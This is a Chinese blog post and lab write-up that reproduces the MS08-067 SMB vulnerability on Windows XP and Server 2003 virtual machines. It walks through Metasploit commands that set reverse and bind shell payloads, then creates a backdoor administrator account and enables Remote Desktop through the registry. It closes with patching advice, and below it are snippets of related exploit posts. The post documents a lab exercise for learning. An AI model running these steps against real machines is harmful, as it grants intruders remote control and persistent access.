虚拟机winxp纯净_WinXP的MS08067漏洞利用复现和解决方案

最新推荐文章于 2024-09-06 12:57:32 发布
最新推荐文章于 2024-09-06 12:57:32 发布
阅读量226 收藏
点赞数
文章标签: 虚拟机winxp纯净
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_39760619/article/details/111683041
版权
本文详细介绍了MS08-067漏洞的复现过程,包括在WinXP和Win2003虚拟机上的利用步骤,以及解决方案。首先,通过CVE、NVD等资源查找漏洞信息,然后在虚拟机中进行环境配置,确保445端口开放。接着,利用Metasploit进行系统渗透,创建管理员用户并开启远程访问。最后,提出升级系统和安装补丁作为解决措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

35106ec9a84116a762a901715479a894.gif

点击上方蓝字关注我们

漏洞利用前准备

寻找漏洞

·CVE https://cve.mitre.org/

Common Vulnerabilities & Exposures公共漏洞和暴露, 由MITRE 1999年发起以社区作为努力方向

·NVD https://nvd.nist.gov/

美国国家通用漏洞数据库,National Institute of Standards and Technology (NIST) 2005年发起.

·CNVD

CNVD是国家信息安全漏洞共享平台,英文是China National Vulnerability Database,隶属于国家计算机网络应急技术处理协调中心(CNCERT),CNCERT则是工信部的下属单位。

·CNNVD http://www.cnnvd.org.cn/

CNNVD是中国国家信息安全漏洞库,英文名称China National Vulnerability Database of Information Security,简称CNNVD,隶属于中国信息安全测评中心(一般简称国测,国测的主管单位是Security部),是中国信息安全测评中心为切实履行漏洞分析和风险评估的职能,负责建设运维的国家级信息安全漏洞库,为我国信息安全保障提供基础服务。

·MSRC https://docs.microsoft.com/en-us/security-updates/

Microsoft Security Response Center (微软安全应急响应中心)提供的 Security Advisories and Bulletins安全警告和公告

我们今天要介绍的就是MS08-067,看名称就可以知道,是在08年的第67个公告 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067

虚拟机安装
需要的文件

·各种虚拟机系统: 自备        

·纯净版WinXPSP3:winxp-sp3 English(winxpensp3)

·Kali Linux 虚拟机文件: kali-linux-2020.2-vmware-amd64.7z (默认用户名密码不是root/toor而是kali/kali)

安装过程(略)

·记得将虚拟机的网卡都设置为桥接模式

·WinXP系统管理员(Administrator)密码可以设置为复杂密码

·WinXP初次启动画面选择不启动自动更新,第一个用户名随便填写

·WinXP启动后关闭Windows自带防火墙

·Kali如果不是用虚拟机镜像而是ISO向导安装,建议默认安装区域和语言都选择美国英语,然后参考下面的中文支持,否则对一般用户很麻烦。

·Kali使用默认的qterminal

·Kali中文支持

o打开终端

osudo dpkg-reconfigure locales里面选择en_US.UTF-8、zh_CN.GBK、zh_CN.UTF-8,用空格选定,用Tab选择OK回车

o默认环境可以选择zh_CN.UTF-8也可以选择en_US.UTF-8

o更新包为最新内容 sudo apt-get update ,有些人也可以选择更新到国内源,只是需要修改/etc/apt/sources.list的源内容,具体可以提issue询问如何修改

o安装默认桌面环境需要的字体sudo apt-get install xfonts-intl-chinese ttf-wqy-microhei

o重启Kali -> reboot

攻击者ip为192.168.1.102

被攻击的ip为192.168.1.128

03漏洞利用

嗅探端口看看445端口开了没

9958675f7cbcb27fe0ee1ce20f03dcea.png

看到确实开放了445端口也就是SMB

系统渗透

·进入msf终端

kali@kali:~$ msfconsole

f4db091f5638b930e11225fd9a6b4544.png

·搜索ms08_067漏洞信息

msf5 > search ms08_067

16efbc2ae2297fbbe4c75a4c7f0c8f79.png

·选择利用此漏洞

msf5 > use exploit/windows/smb/ms08_067_netapi

fa12e691e3293dcc333797c226a11972.png

·设置payload

786a71bf691a59f0491eaebc77077323.png

输入 show payloads

acf5d3193119bdbb82866dae0111e139.png

msf5 exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp

6cb53bf10b1ad276e79cf163695064e9.png

·设置target为XP2001

msf exploit(windows/smb/ms08_067_netapi) > set target 6

10cfd3d0517b6e873dc8117ac93c3b90.png

·设置目标机器IP地址

msf exploit(windows/smb/ms08_067_netapi) > set RHOST "192.168.1.128"

c475cec199eb937f2002586b57ecdfa6.png

·查看当前渗透选项

msf exploit(windows/smb/ms08_067_netapi) > show options

fcc6a5871ec259c46367b0c145ca4907.png

·开始渗透

b5c1744cd1250d3e06ca5b6237ce6ad7.png

这样就已经成功拿到Windows Shell


漏洞利用

创建Windows用户,用户名为someone 密码为12345678

命令 net user someone 12345678 /add

c382873cda7b8b7ad1bbaf445f6cf46c.png

命令成功完成。

将用户someone加入管理员组

命令 net localgroup administrators someone /add        

0d8291aa0f59eebf7e77a382ff882013.png

命令成功完成

·修改注册表开启远程访问

命令 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

操作成功结束        

c83d0a1b1c3b334139fb66251ab3398f.png

此时用netstat -an可以看到3389端口开启,说明已经有效了        

093d22acd6b41b2ee9afa8e12e84fd63.png

这样我们可以用远程桌面连接了 例如

rdesktop 192.168.1.128

f031cf3299af5166411cdc24e5e9e4c2.png

b6b871acd30d03e6df44b126edf47cd2.png

04 解决方案

升级到最新的Windows系统

安装KB958644补丁        


Win2003的MS08-067漏洞利用复现和解决方案

漏洞利用前准备

寻找漏洞

·CVE https://cve.mitre.org/

Common Vulnerabilities & Exposures公共漏洞和暴露, 由MITRE 1999年发起以社区作为努力方向

·NVD https://nvd.nist.gov/

美国国家通用漏洞数据库,National Institute of Standards and Technology (NIST) 2005年发起.

·CNVD

CNVD是国家信息安全漏洞共享平台,英文是China National Vulnerability Database,隶属于国家计算机网络应急技术处理协调中心(CNCERT),CNCERT则是工信部的下属单位。

·CNNVD http://www.cnnvd.org.cn/

CNNVD是中国国家信息安全漏洞库,英文名称China National Vulnerability Database of Information Security,简称CNNVD,隶属于中国信息安全测评中心(一般简称国测,国测的主管单位是Security部),是中国信息安全测评中心为切实履行漏洞分析和风险评估的职能,负责建设运维的国家级信息安全漏洞库,为我国信息安全保障提供基础服务。

·MSRC https://docs.microsoft.com/en-us/security-updates/

Microsoft Security Response Center (微软安全应急响应中心)提供的 Security Advisories and Bulletins安全警告和公告

我们今天要介绍的就是MS08-067,看名称就可以知道,是在08年的第67个公告 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067

虚拟机安装
需要的文件

·各种虚拟机系统: 自备

·Win2003虚拟机:Win2K3 Metasploit

·Kali Linux 虚拟机文件: kali-linux-2020.2-vmware-amd64.7z (默认用户名密码不是root/toor而是kali/kali)

安装过程(略)

·记得将虚拟机的网卡都设置为桥接模式

·Win2003系统管理员(Administrator)密码可以设置为复杂密码

·Win2003初次启动画面选择不启动自动更新,第一个用户名随便填写

·Win2003启动后关闭Windows自带防火墙

·Kali如果不是用虚拟机镜像而是ISO向导安装,建议默认安装区域和语言都选择美国英语,然后参考下面的中文支持,否则对一般用户很麻烦。

·Kali使用xfce Terminal而不是默认的qterminal

0x03 漏洞利用

机器地址

攻击者ip 192.168.1.105

被攻者IP 192.168.1.128


嗅探端口看看445端口开放没

kali@kali:~$ nmap -PS 192.138.1.128

893b2cdafdd0d9626741736c0cb95125.png

看到确实开放了445端口也就是SMB

系统渗透

·进入msf终端

kali@kali:~$ msfconsole

098c534ac1039a2a3d0473bcac538859.png

·搜索ms08_067漏洞信息

msf5 > search ms08_067

7e10e6135521bca5e406aa50d8375f78.png

·选择利用此漏洞

msf5 > use exploit/windows/smb/ms08_067_netapi

dd22b0f97d1d8f2fdbbea777b59cd056.png

·设置payload

msf5 exploit(windows/smb/ms08_067_netapi) > set payload "generic/shell_bind_tcp"

dd22b0f97d1d8f2fdbbea777b59cd056.png

·设置target为win2003-english,我这里不知道他是哪个所以填0        

msf5 exploit(windows/smb/ms08_067_netapi) > set target 0

66fd4e8d0d0ca122a5aec0fae890b74d.png

·设置目标机器和被攻击机器IP地址RHOST-被攻击LHOST-攻击机器

msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST "192.168.1.128"

msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST"192.168.1.108"

afa0c54841829a443c45547c5edaa780.png

·查看当前渗透选项

msf5 exploit(windows/smb/ms08_067_netapi) > show options

403bde5d649b2a38eefe9c3c110de0de.png

开始渗透

ce6b0a6237af2ee6d2962bbea8d62ba3.png

这样就已经成功拿到Windows Shell


漏洞利用

创建Windows用户,用户名为someone 密码为12345678

命令 net user someone 12345678 /add

命令成功完成

4ad840494309135ed3c1e886f8f58957.png

将用户someone加入管理员组

命令net localgroup administrators someone /add

命令成功完成。

9d6e5f8d9240f4d54be4f9c4a2aec3af.png

修改注册表开启远程访问

命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3132d55227e6b96fd7c0f885a2512908.png

操作成功结束

此时用netstat -an可以看到3389端口开启,说明已经有效了

68946ef8b95d2992fbc1e48cf4246ec0.png

这样我们可以用远程桌面连接了 例如

rdesktop 192.168.1.128

15f6272e7a77cdbc9519406e913bdfcb.png

0x04 解决方案

升级到最新的Windows系统

安装KB958644补丁

CVE-2019-0708 windwos 远程桌面协议(RDP) 漏洞利用及加固
alert['Hello World']
11-11 1106
漏洞描述: 当未经身份验证的攻击者使用RDP连接到目标系统并发送经特殊设计的请求(也称为“远程桌面服务远程执行代码漏洞”)时,远程桌面服务中存在一个远程执行代码漏洞(以前称为终端服务)。 影响版本: - Windows XP SP3 x86 - Windows XP专业x64版SP2 - Windows XP Embedded SP3 x86 - Windows Server 2003 SP2 x86 - Windows Server 2003 x64版本SP2 环境搭建 漏洞检测 漏洞利用
泛微e-cology OA Beanshell组件远程代码执行漏洞复现CNNVD-201909-1041
ddr12231的博客
09-23 743
靶机 影响版本 泛微e-cology<=9.0 https://github.com/jas502n/e-cology 部署 复现 /weaver/bsh.servlet.BshServlet POC exec("whoami") 这是BeanShell命令的其他一些示例 source(),run()-将bsh脚本读入该解释器,或在新的解释器中运行 frame()-在Frame...
微软最牛MS08-067漏洞各系统补丁下载地址
热门推荐
人生倒计时
12-12 7万+
本次MS08-067严重漏洞各系统补丁地址如下:  中文操作系统KB958644补丁下载地址:  Windows Vista 安全更新程序 (KB958644)  http://download.microsoft.com/download/d/c/0/dc047ab9-53f8-481c-8c46-528b7f493fc1/Windows6.0-KB958644-x86.msu 
ms08-067漏洞 远程溢出入侵测试
十年磨一剑,霜刃未曾试!
09-25 3万+
被攻击者IP地址:192.168.9.4,操作系统Windows XP sp3 English 攻击者IP地址:192.168.9.1   //查看数据库连接状态 msf &gt; db_status [*] postgresql connected to msf3 //使用nmap扫描目标机器 msf &gt; db_nmap -sS -sV -O --script=smb-check...
漏洞利用实战(一) winxpms08_067漏洞利用复现
weixin_44031198的博客
11-08 3735
我竟然把这个坑填下去了,可喜可贺。 1 ms08_067 ms08_067是微软win操作系统中存在的一个服务器服务漏洞,在win server2008之前的系统都会受这个漏洞影响,黑客可以利用这个漏洞控制目标系统。 2 操作概述 使用kali linux攻击机对win xp系统利用漏洞进行攻击,在靶机上建立管理员账号并远程控制靶机。 3 实验环境 ...
MS08-067漏洞攻击图解全过程演示
最新发布
weixin_42515392的博客
09-06 1727
本文还有配套的精品资源,点击获取 简介:MS08-067漏洞,亦称“Windows Server Service RPC Handling 漏洞”,是微软于2008年修复的重大安全漏洞。它影响Windows XP、Windows Server 2003等系统,允许远程执行任意代码。本演示通过图解详细介绍该漏洞的起源、攻击手段防护措施,以及对网络安全历史的影响。 ...
漏洞CNNVD-201805-248的复现与提权
weixin_43434933的博客
06-23 1208
实验原理介绍(图文) 本次实验实现漏洞CNNVD-201805-248的复现与入侵,以及后续的提权管理员留后门操作。 漏洞基本信息: 漏洞名称:Microsoft Windows VBScript 引擎安全漏洞 CNNVD编号:CNNVD-201805-248 CVE编号:CVE-2018-8174 危害等级:高危 漏洞类型:缓冲区错误 威胁类型:远程 发布时间:2018-05-10 漏洞简...
ms12-020漏洞winxp复现(CVE-2012-0002)
A1111143567的博客
12-26 4538
首先声明实验所用环境 VM12虚拟机windows xp professional镜像(提醒一句处理器内存不要分配过多,否则会出现爆破不成功的情况) VM12虚拟机Linux kali 我的笔记本连接的是我的手机热点 两个虚拟机均使用桥接模式并复制物理地址 xp的ip为192.168.43.94 kali的ip为192.168.43.181 xp的ip地址可以使用cmd命令ipconfig查看 ...
使用kali实践一个简单的winxp漏洞MS08_067
幸福诗歌的博客
01-25 2995
8-067漏洞演示与CVE-2017-11882漏洞复现 MS08_067漏洞是著名的远程溢出漏洞,影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。本次实验就是metasploit利用ms08_0...
metasploit 框架之利用 ms08_067 漏洞渗透Windows XP SP3 Chinese - Simplified (NX)实验过程及错误处理
max_ii_min的博客
02-18 2万+
1:渗透目标 查找并利用Ms08-067漏洞模块对内网主机进行渗透攻击,渗透成功拿到会话后,执行一些命令。 2:准备阶段 2.1软件 Kali linux (链接:https://pan.baidu.com/s/1b3eE0c8vNPqGWMzWoLZhpw 提取码:siud) Windows XP SP3 Chinese - Simplified (NX)(链接:https://p...
【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 4901
(1)了解beEF工具的使用; (2)加深理解XSS漏洞利用危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握通过XSS漏洞GetShell的方法。
cve-2018-20250 WinRAR代码执行漏洞演示
02-28
此视频是对与WinRAR 代码执行漏洞的演示视频,因为原漏洞发布厂商并没有发布对应的poc,演示视频,特录制了视频方便大家观看效果,里面还附带了大家最想要的poc ,希望对大家有帮助
CVE-2017-11780 windows高危漏洞
01-03
针对CVE-2017-11780的Windows SMB(SMBv1)远程代码执行漏洞针对CVE-2017-11771的Windows Search远程代码执行漏洞
Webmin 远程代码执行 (CVE-2022-0824)漏洞搭建复现+攻击检测原理(流量分析)详细
m0_60884805的博客
09-19 4066
在 Webmin v1.984 中,影响文件管理器模块,任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程 URL 下载文件更改文件权限 (chmod)。通过在文件管理器中链接这些功能,可以通过精心制作的 .cgi 文件实现远程代码执行。
渗透攻击MS08-067
hmysn的博客
12-22 2184
渗透攻击MS08-067
Redis 未授权访问 CNNVD-201511-230 漏洞复现
Senimo
05-03 2520
CNNVD-201511-230 Redis 未授权访问漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 Redis 是美国 RedisLabs 公司赞助的一套开源的使用 ANSIC 编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的 API。Redis 中存在未授权访问漏洞,该漏洞源于程序在默认配置下会绑定在 6379 端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序
春秋云境:CVE-2022-22963[漏洞复现]
如有错误感谢斧正
08-10 1257
到2024年8月11日,为期14天的专项国护结束最近都在忙攻防看1day、nday复现,现在有空了写一下靶场的复现
初入渗透:CVE-2017-0199漏洞复现
qq_35538264的博客
03-30 1448
1:在 web根目录下/www : 创建一个1.rtf文件:附上代码 ;上是在kali中的服务; 在windows上创空的office;并在里面创建对象 , 这时候会生成一个有test789文字内嵌对象的文档,这是双击该对象只能以rtf文件方式打开对象,并不能执行hta脚本。因为生成对象的时候选中“链接到文件”,所以当打开对象的时候会去服务器上请求http://192.168.1.108/1.r...
winxp虚拟机镜像_WinXPMS08067漏洞利用复现解决方案
weixin_30082211的博客
01-26 883
点击上方蓝字关注我们漏洞利用前准备寻找漏洞·CVEhttps://cve.mitre.org/Common Vulnerabilities & Exposures公共漏洞暴露, 由MITRE 1999年发起以社区作为努力方向·NVDhttps://nvd.nist.gov/美国国家通用漏洞数据库,National Institute of Standards and Tec...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值